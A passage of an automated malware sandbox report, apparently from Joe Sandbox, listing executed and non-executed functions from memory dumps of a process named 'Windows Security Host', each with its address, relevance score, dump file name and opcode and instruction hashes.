                                                                                                                                                        Function 00007FFAAC591F49 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 728733971208bd146bc176040d56d705b06093cd60ee3a1084f06a1305fe56c2
                                                                                                                                                        • Instruction ID: ada7555f35d8ee1887c0a38b25745f9dfa43dc2f92abc8bd2d98352f27cdb466
                                                                                                                                                        • Opcode Fuzzy Hash: 728733971208bd146bc176040d56d705b06093cd60ee3a1084f06a1305fe56c2
                                                                                                                                                        • Instruction Fuzzy Hash: D8214161B189494FE788FB2CD45A778B6C2EB99315F0449BAE04EC3293DE689C418745
                                                                                                                                                        Function 00007FFAAC590855 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: e9cac144d849d2899c72cc788628890df85cccc80da0ec408a3173f3f7d38ef8
                                                                                                                                                        • Instruction ID: 3f3b1fd3119fb6076ab0b0fe23f91f0b3f816a6226778f4b9306e9145bdbbbda
                                                                                                                                                        • Opcode Fuzzy Hash: e9cac144d849d2899c72cc788628890df85cccc80da0ec408a3173f3f7d38ef8
                                                                                                                                                        • Instruction Fuzzy Hash: 2A31F861A8D6894FD751DB78C8A58B93FA1EF89340F85C4B5E80AC7397CD34AD05C782
                                                                                                                                                        Function 00007FFAAC592041 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: ba33f2cc1ff4fb5305997e0f7dcb9af38bea3a65309ecddbd54c72d4dc75471a
                                                                                                                                                        • Instruction ID: a01526318772923d2b18d5a66ec166ee043e14d00f8a8793985b9d4057b633e7
                                                                                                                                                        • Opcode Fuzzy Hash: ba33f2cc1ff4fb5305997e0f7dcb9af38bea3a65309ecddbd54c72d4dc75471a
                                                                                                                                                        • Instruction Fuzzy Hash: 8801244994E6824FF351A7385C549327FE4CB96340B0844FAE88DC7197D80D994983C2
                                                                                                                                                        Function 00007FFAAC591190 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8aa4c7cc9f222e55d1f9b37b0eb4fa21af1bcbc33c0ff46559c6574f236d66ff
                                                                                                                                                        • Instruction ID: bf7144f8daacb90b615d6aeb71f82118fd7abc1a0241831358e6dcf89d12d6f2
                                                                                                                                                        • Opcode Fuzzy Hash: 8aa4c7cc9f222e55d1f9b37b0eb4fa21af1bcbc33c0ff46559c6574f236d66ff
                                                                                                                                                        • Instruction Fuzzy Hash: 52D09531C5492D4FE694CA2CE008176F7D4EB4525071401FBF40CD3560C5654C4143C5

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFAAC5906FA Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000022.00000002.1955991572.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_34_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: <N_^$=N_^$N_^j$N_^p
                                                                                                                                                        • API String ID: 0-2936155160
                                                                                                                                                        • Opcode ID: 61c07cf0960d95d2eab6891a071833b769e7aff13fe1cf8bed470a440df4cd6d
                                                                                                                                                        • Instruction ID: f570372f7c0af8eb1ccb59e89209c49791e3e2292d7ede43e578b36955aad554
                                                                                                                                                        • Opcode Fuzzy Hash: 61c07cf0960d95d2eab6891a071833b769e7aff13fe1cf8bed470a440df4cd6d
                                                                                                                                                        • Instruction Fuzzy Hash: 2F313AE7A8D5178AF30233FC6C655E82BC59F89374718C9B2D29DCA1D3CD18B04A56D2

                                                                                                                                                        Executed Functions

                                                                                                                                                        Function 00007FFAAC591689 Relevance: .7, Instructions: 670COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 00010073f9600ea72fca8c7c000b50cc412d1cc9ac6a7f543b7bf14f7f628a58
                                                                                                                                                        • Instruction ID: d1c201d1e712fbb4869303fb38577b54a267467775cc9623ef5c36f1cfe2e37c
                                                                                                                                                        • Opcode Fuzzy Hash: 00010073f9600ea72fca8c7c000b50cc412d1cc9ac6a7f543b7bf14f7f628a58
                                                                                                                                                        • Instruction Fuzzy Hash: 24221761E18A5A8FF794FB3CC85967977D2FF89300F4485B9E04EC3292DE2CA8458781
                                                                                                                                                        Function 00007FFAAC5916C9 Relevance: .6, Instructions: 571COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 266c78951e19cb416fac8e9d63f4bf1e3cbf07e8ee84876e7f810033e111d8cf
                                                                                                                                                        • Instruction ID: b847bf32ef0e2d52210ec2af289db3252c19bd7bd00dbd385e80fd865ffca989
                                                                                                                                                        • Opcode Fuzzy Hash: 266c78951e19cb416fac8e9d63f4bf1e3cbf07e8ee84876e7f810033e111d8cf
                                                                                                                                                        • Instruction Fuzzy Hash: FE020561F19A5A8FF798F738885967976D2FF99300F4485B8E04EC32D6DE2DAC058381
                                                                                                                                                        Function 00007FFAAC5911F2 Relevance: .5, Instructions: 545COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 0ce7e817c89c49c889d6f1d3b88078a863837aa2f9eed0dca2339bb3d038cd31
                                                                                                                                                        • Instruction ID: 02e02760c66a27af6910dc1b55660d2f4db0c0ba972d1fc733a9c2774696ebe6
                                                                                                                                                        • Opcode Fuzzy Hash: 0ce7e817c89c49c889d6f1d3b88078a863837aa2f9eed0dca2339bb3d038cd31
                                                                                                                                                        • Instruction Fuzzy Hash: 5E21C362D58A6B8BFB44A3B8C8655FA7BF5FF45300F448076E04AC7593DD29A84687C0
                                                                                                                                                        Function 00007FFAAC590C3E Relevance: .2, Instructions: 178COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 71e2301040bef1a4d5bafaf655ffc0ed4250197b7dcc1252d563107d2d19f167
                                                                                                                                                        • Instruction ID: 046b6feef3d3cb8020cadd5091bdad88b898c5da85451fc5c770f6b4d9d62214
                                                                                                                                                        • Opcode Fuzzy Hash: 71e2301040bef1a4d5bafaf655ffc0ed4250197b7dcc1252d563107d2d19f167
                                                                                                                                                        • Instruction Fuzzy Hash: F1515722A0E7860FE356A778C8165757FE5EF9B210B0944FAE48DC72A3CC1C9C468352
                                                                                                                                                        Function 00007FFAAC590AD1 Relevance: .1, Instructions: 132COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2c43d64b54fc03eb04afb8862ee71af9638a1d45269dc9354b3061161b09bca5
                                                                                                                                                        • Instruction ID: 989a08f3ad854c442310bb2ca4e2250a3ba88337b24c80c9ed47d38e9e714460
                                                                                                                                                        • Opcode Fuzzy Hash: 2c43d64b54fc03eb04afb8862ee71af9638a1d45269dc9354b3061161b09bca5
                                                                                                                                                        • Instruction Fuzzy Hash: 20319392B1DA4A8BF744B7B898597BD77D6EB9D311F0486B6E00DC3292DD2C98428381
                                                                                                                                                        Function 00007FFAAC590985 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 563d3013f8cd496cb2a5a693d9d28011e0c889d3b2c0066b8ab7af418dcd93f5
                                                                                                                                                        • Instruction ID: 2e4473bf51f9f994c244e28f05abec7531119a53b64427ee7930b546855b5a83
                                                                                                                                                        • Opcode Fuzzy Hash: 563d3013f8cd496cb2a5a693d9d28011e0c889d3b2c0066b8ab7af418dcd93f5
                                                                                                                                                        • Instruction Fuzzy Hash: B0318271A1860E8FEB44FBB8C8556EEB7E1FF99301F508575D00AD7296CE39A845C780
                                                                                                                                                        Function 00007FFAAC591F49 Relevance: .1, Instructions: 104COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d16d97850778e3a7a86a5b3587e2180d5413faf5550b5b23c6c7ddec96d799ed
                                                                                                                                                        • Instruction ID: d326d9df2024ae6a9b32471db37e93172c48ddbc294a63bcf54d0ad7ec959fd0
                                                                                                                                                        • Opcode Fuzzy Hash: d16d97850778e3a7a86a5b3587e2180d5413faf5550b5b23c6c7ddec96d799ed
                                                                                                                                                        • Instruction Fuzzy Hash: 6C216161B189494FE788FB2CD45A778B6C2EB99315F0449BAE04EC3293DE689C418741
                                                                                                                                                        Function 00007FFAAC590855 Relevance: .1, Instructions: 90COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: d69e5fc5a280a71f91ebcbd8783ec77286f2ba81770aa66e2edb06f6e974bfdc
                                                                                                                                                        • Instruction ID: f053c84cee76be8b79e33465f5922acb0d7980fcf6d2469556baf32f7865fbf1
                                                                                                                                                        • Opcode Fuzzy Hash: d69e5fc5a280a71f91ebcbd8783ec77286f2ba81770aa66e2edb06f6e974bfdc
                                                                                                                                                        • Instruction Fuzzy Hash: F531062064C68D8FD780FB6C88658A97FE1BF85304B94C4B5E44AC7B9ACE285C49C781
                                                                                                                                                        Function 00007FFAAC592041 Relevance: .0, Instructions: 47COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 34907e5e9524b125e11ed9008dd359e7f0b171bb7c9df55efc3213a4c0569782
                                                                                                                                                        • Instruction ID: 8b95667014d1b2a673e2cbcc119c92a67f50346f9e752e3d698c00645855fa5a
                                                                                                                                                        • Opcode Fuzzy Hash: 34907e5e9524b125e11ed9008dd359e7f0b171bb7c9df55efc3213a4c0569782
                                                                                                                                                        • Instruction Fuzzy Hash: A7012F0990E6869FF341A7384C589327FE4CB96340B0884FAE8CDCA197D80D988A83C2
                                                                                                                                                        Function 00007FFAAC591190 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 8aa4c7cc9f222e55d1f9b37b0eb4fa21af1bcbc33c0ff46559c6574f236d66ff
                                                                                                                                                        • Instruction ID: bf7144f8daacb90b615d6aeb71f82118fd7abc1a0241831358e6dcf89d12d6f2
                                                                                                                                                        • Opcode Fuzzy Hash: 8aa4c7cc9f222e55d1f9b37b0eb4fa21af1bcbc33c0ff46559c6574f236d66ff
                                                                                                                                                        • Instruction Fuzzy Hash: 52D09531C5492D4FE694CA2CE008176F7D4EB4525071401FBF40CD3560C5654C4143C5

                                                                                                                                                        Non-executed Functions

                                                                                                                                                        Function 00007FFAAC5906FA Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000023.00000002.2036651413.00007FFAAC590000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC590000, based on PE: false
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_35_2_7ffaac590000_Windows Security Host.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: <N_^$=N_^$N_^j$N_^p
                                                                                                                                                        • API String ID: 0-2936155160
                                                                                                                                                        • Opcode ID: 61c07cf0960d95d2eab6891a071833b769e7aff13fe1cf8bed470a440df4cd6d
                                                                                                                                                        • Instruction ID: f570372f7c0af8eb1ccb59e89209c49791e3e2292d7ede43e578b36955aad554
                                                                                                                                                        • Opcode Fuzzy Hash: 61c07cf0960d95d2eab6891a071833b769e7aff13fe1cf8bed470a440df4cd6d
                                                                                                                                                        • Instruction Fuzzy Hash: 2F313AE7A8D5178AF30233FC6C655E82BC59F89374718C9B2D29DCA1D3CD18B04A56D2